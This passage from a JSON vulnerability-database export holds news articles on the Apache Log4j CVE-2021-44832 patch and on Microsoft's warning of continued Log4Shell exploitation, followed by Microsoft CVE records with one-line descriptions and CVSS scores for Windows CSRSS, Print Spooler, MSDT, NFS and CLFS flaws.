Vulnerability](https://thehackernews.com/new-images/img/a/AVvXsEj5U0g2_WyR8SbKST5XjqUQfiNDFBnK1P10zvn_VmGHTvYewDJ_f6Uba7GdDWj_q7hpd94W2z43r10bfWui1lC5yjhHu93_YJ6bs715HJNCdeWTWwuf_Z05KOjQsJczoeLDMRTOlaGfVvbwSX9ADqbQPWrdoXvAhoMbYRhL7kbb1cg7eKHjMhv0e-E9=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEj5U0g2_WyR8SbKST5XjqUQfiNDFBnK1P10zvn_VmGHTvYewDJ_f6Uba7GdDWj_q7hpd94W2z43r10bfWui1lC5yjhHu93_YJ6bs715HJNCdeWTWwuf_Z05KOjQsJczoeLDMRTOlaGfVvbwSX9ADqbQPWrdoXvAhoMbYRhL7kbb1cg7eKHjMhv0e-E9>)\n\nThe Apache Software Foundation (ASF) on Tuesday rolled out fresh patches to contain an arbitrary code execution flaw in Log4j that could be abused by threat actors to run malicious code on affected systems, making it the fifth security shortcoming to be discovered in the tool in the span of a month.\n\nTracked as [CVE-2021-44832](<https://nvd.nist.gov/vuln/detail/CVE-2021-44832>), the vulnerability is rated 6.6 in severity on a scale of 10 and impacts all versions of the logging library from 2.0-alpha7 to 2.17.0 with the exception of 2.3.2 and 2.12.4. While Log4j versions 1.x are not affected, users are recommended to upgrade to Log4j 2.3.2 (for Java 6), 2.12.4 (for Java 7), or 2.17.1 (for Java 8 and later).\n\n\"Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code,\" the ASF [said](<https://logging.apache.org/log4j/2.x/security.html>) in an advisory. \"This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.\"\n\nAlthough no credits were awarded by the ASF for the issue, Checkmarx security researcher Yaniv Nizry [claimed credit](<https://twitter.com/YNizry/status/1475764153373573120>) for reporting the vulnerability to Apache on December 27.\n\n\"The complexity of this vulnerability is higher than the original CVE-2021-44228 since it requires the attacker to have control over the configuration,\" Nizry [noted](<https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/>). \"Unlike Logback, in Log4j there is a feature to load a remote configuration file or to configure the logger through the code, so an arbitrary code execution could be achieved with [an] MitM attack, user input ending up in a vulnerable configuration variable, or modifying the config file.\"\n\nWith the latest fix, the project maintainers have addressed a total of four issues in Log4j since the [Log4Shell](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>) flaw came to light earlier this month, not to mention a fifth vulnerability affecting versions Log4j 1.2 that will not be fixed \u2014\n\n * [**CVE-2021-44228**](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>) (CVSS score: 10.0) - A remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.14.1 (Fixed in version 2.15.0)\n * [**CVE-2021-45046**](<https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html>) (CVSS score: 9.0) - An information leak and remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.15.0, excluding 2.12.2 (Fixed in version 2.16.0)\n * [**CVE-2021-45105**](<https://thehackernews.com/2021/12/apache-issues-3rd-patch-to-fix-new-high.html>) (CVSS score: 7.5) - A denial-of-service vulnerability affecting Log4j versions from 2.0-beta9 to 2.16.0 (Fixed in version 2.17.0)\n * [**CVE-2021-4104**](<https://nvd.nist.gov/vuln/detail/CVE-2021-4104>) (CVSS score: 8.1) - An untrusted deserialization flaw affecting Log4j version 1.2 (No fix available; Upgrade to version 2.17.1)\n\nThe development also comes as intelligence agencies from across Australia, Canada, New Zealand, the U.K., and the U.S. [issued](<https://thehackernews.com/2021/12/cisa-fbi-and-nsa-publish-joint-advisory.html>) a joint advisory warning of mass exploitation of multiple vulnerabilities in Apache's Log4j software library by nefarious adversaries.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-29T04:59:00", "type": "thn", "title": "New Apache Log4j Update Released to Patch Newly Discovered Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-29T05:00:00", "id": "THN:1D10167F5D53B2791D676CF56488D5D9", "href": "https://thehackernews.com/2021/12/new-apache-log4j-update-released-to.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:44", "description": "[![Apache Log4j Vulnerabilities](https://thehackernews.com/new-images/img/a/AVvXsEgNLP8yONJbG3r97wko9PpPe2QACzC9nklHfNtPdJrZ2-Zep3_4A5RuH3VU3VVsigHm4wVeChASXi-pPF2tb1KLj110Y0kKVP2D3IRRNEx50hCFfeSWEgtb1JYx5QXyehNyv5ydH9ffEHse8hcLH2MLDRbtmMlkz_dOBnTED2Qly7MUL3KGQlUWc862=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEgNLP8yONJbG3r97wko9PpPe2QACzC9nklHfNtPdJrZ2-Zep3_4A5RuH3VU3VVsigHm4wVeChASXi-pPF2tb1KLj110Y0kKVP2D3IRRNEx50hCFfeSWEgtb1JYx5QXyehNyv5ydH9ffEHse8hcLH2MLDRbtmMlkz_dOBnTED2Qly7MUL3KGQlUWc862>)\n\nMicrosoft is warning of continuing attempts by nation-state adversaries and commodity attackers to take advantage of [security vulnerabilities](<https://thehackernews.com/2021/12/new-apache-log4j-update-released-to.html>) uncovered in the Log4j open-source logging framework to deploy malware on vulnerable systems.\n\n\"Exploitation attempts and testing have remained high during the last weeks of December,\" Microsoft Threat Intelligence Center (MSTIC) [said](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) in revised guidance published earlier this week. \"We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks.\"\n\nPublicly disclosed by the Apache Software Foundation on December 10, 2021, the remote code execution (RCE) vulnerability in Apache Log4j 2, aka [Log4Shell](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>), has emerged as a new attack vector for [widespread exploitation](<https://thehackernews.com/2021/12/hackers-begin-exploiting-second-log4j.html>) by a variety of threat actors.\n\nIn the subsequent weeks, four more weaknesses in the utility have come to light \u2014 [CVE-2021-45046](<https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html>), [CVE-2021-45105](<https://thehackernews.com/2021/12/apache-issues-3rd-patch-to-fix-new-high.html>), [CVE-2021-4104](<https://nvd.nist.gov/vuln/detail/CVE-2021-4104>), and [CVE-2021-44832](<https://thehackernews.com/2021/12/new-apache-log4j-update-released-to.html>) \u2014 providing opportunistic bad actors with persistent control over the compromised machines and mount an evolving array of attacks ranging from [cryptocurrency miners](<https://thehackernews.com/2021/12/apache-log4j-vulnerability-log4shell.html>) to [ransomware](<https://thehackernews.com/2021/12/hackers-exploit-log4j-vulnerability-to.html>).\n\nEven as the mass scanning attempts are showing no signs of letting up, efforts are underway to evade string-matching detections by obfuscating the malicious HTTP requests orchestrated to generate a web request log using Log4j that leverages JNDI to perform a request to the attacker-controlled site.\n\n[![Apache Log4j Vulnerabilities](https://thehackernews.com/new-images/img/a/AVvXsEgaISQLd_s-KbQbfGfCrOYexKT53Aj4HUmyQM8dc_d3S-50B1F8f-o8zz5QpnE2lrZ5JH_sn9V2_Qz7Cear4RyxRx35PWKEpOGwiJndccR5DK4nke5kFXDxkPOp6dO5BQEqTPyxxSXMT31uKobWxtRh-c-goH94Z5oYdhpx8oFF_Fc0WE5iojT1PY__=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEgaISQLd_s-KbQbfGfCrOYexKT53Aj4HUmyQM8dc_d3S-50B1F8f-o8zz5QpnE2lrZ5JH_sn9V2_Qz7Cear4RyxRx35PWKEpOGwiJndccR5DK4nke5kFXDxkPOp6dO5BQEqTPyxxSXMT31uKobWxtRh-c-goH94Z5oYdhpx8oFF_Fc0WE5iojT1PY__>)\n\nIn addition, Microsoft said it observed \"rapid uptake of the vulnerability into existing botnets like Mirai, existing campaigns previously targeting vulnerable Elasticsearch systems to deploy cryptocurrency miners, and activity deploying the [Tsunami](<https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami>) backdoor to Linux systems.\"\n\nOn top of that, the Log4Shell vulnerability has also been put to use to drop additional remote access toolkits and reverse shells such as [Meterpreter](<https://malpedia.caad.fkie.fraunhofer.de/details/win.meterpreter>), [Bladabindi](<https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat>) (aka NjRAT), and [HabitsRAT](<https://malpedia.caad.fkie.fraunhofer.de/details/win.habitsrat>).\n\n\"At this juncture, customers should assume broad availability of exploit code and scanning capabilities to be a real and present danger to their environments,\" MSTIC noted. \"Due to the many software and services that are impacted and given the pace of updates, this is expected to have a long tail for remediation, [requiring](<https://twitter.com/MsftSecIntel/status/1475627081753112579>) ongoing, sustainable vigilance.\"\n\nThe development also comes as the U.S. Federal Trade Commission (FTC) [issued](<https://www.ftc.gov/news-events/blogs/techftc/2022/01/ftc-warns-companies-remediate-log4j-security-vulnerability>) a warning that it \"intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-05T05:12:00", "type": "thn", "title": "Microsoft Warns of Continued Attacks Exploiting Apache Log4j Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-05T05:13:47", "id": "THN:933FE23273AB5250B949633A337D44E1", "href": "https://thehackernews.com/2022/01/microsoft-warns-of-continued-attacks.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2023-01-10T22:21:29", "description": "Windows CSRSS Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-22047, CVE-2022-22049.", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-12T07:00:00", "type": "mscve", "title": "Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22026", "CVE-2022-22047", "CVE-2022-22049"], "modified": "2022-07-12T07:00:00", "id": "MS:CVE-2022-22026", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22026", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-10T22:21:25", "description": "Windows CSRSS Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-22026, CVE-2022-22049.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T07:00:00", "type": "mscve", "title": "Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22026", "CVE-2022-22047", "CVE-2022-22049"], "modified": "2022-07-12T07:00:00", "id": "MS:CVE-2022-22047", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22047", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-10T22:21:25", "description": "Windows CSRSS Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-22026, CVE-2022-22047.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T07:00:00", "type": "mscve", "title": "Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22026", "CVE-2022-22047", "CVE-2022-22049"], "modified": "2022-07-12T07:00:00", "id": "MS:CVE-2022-22049", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22049", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-10T22:21:06", "description": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-35743.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-09T07:00:00", "type": "mscve", "title": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190", "CVE-2022-34713", "CVE-2022-35743"], "modified": "2022-08-10T07:00:00", "id": "MS:CVE-2022-34713", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34713", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-10T22:21:26", "description": "Windows Print Spooler Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-22022, CVE-2022-30206, CVE-2022-30226.", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-12T07:00:00", "type": "mscve", "title": "Windows Print Spooler Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22022", "CVE-2022-22041", "CVE-2022-30206", "CVE-2022-30226"], "modified": "2022-09-20T07:00:00", "id": "MS:CVE-2022-22041", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22041", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-01-10T22:21:31", "description": "Windows Print Spooler Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-22022, CVE-2022-22041, CVE-2022-30206.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-07-12T07:00:00", "type": "mscve", "title": "Windows Print Spooler Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.6, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22022", "CVE-2022-22041", "CVE-2022-30206", "CVE-2022-30226"], "modified": "2022-07-12T07:00:00", "id": "MS:CVE-2022-30226", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30226", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-01-10T22:21:30", "description": "Windows Print Spooler Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-22041, CVE-2022-30206, CVE-2022-30226.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-07-12T07:00:00", "type": "mscve", "title": "Windows Print Spooler Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.6, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22022", "CVE-2022-22041", "CVE-2022-30206", "CVE-2022-30226"], "modified": "2022-07-12T07:00:00", "id": "MS:CVE-2022-22022", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22022", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-01-10T22:21:35", "description": "Windows Print Spooler Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-22022, CVE-2022-22041, CVE-2022-30226.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T07:00:00", "type": "mscve", "title": "Windows Print Spooler Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22022", "CVE-2022-22041", "CVE-2022-30206", "CVE-2022-30226"], "modified": "2022-07-12T07:00:00", "id": "MS:CVE-2022-30206", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30206", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-03T16:21:53", "description": "Windows Network File System Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-22029.", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T07:00:00", "type": "mscve", "title": "Windows Network File System Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22039", "CVE-2022-22029"], "modified": "2022-07-12T07:00:00", "id": "MS:CVE-2022-22039", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22039", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-11-01T12:13:23", "description": "Windows Network File System Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-22039.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T07:00:00", "type": "mscve", "title": "Windows Network File System Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22029", "CVE-2022-22039"], "modified": "2022-07-12T07:00:00", "id": "MS:CVE-2022-22029", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22029", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-29T21:16:45", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-37969.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-13T07:00:00", "type": "mscve", "title": "Windows Common Log File System Driver Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {}, "cvelist": ["CVE-2022-35803", "CVE-2022-37969"], "modified": "2022-09-13T07:00:00", 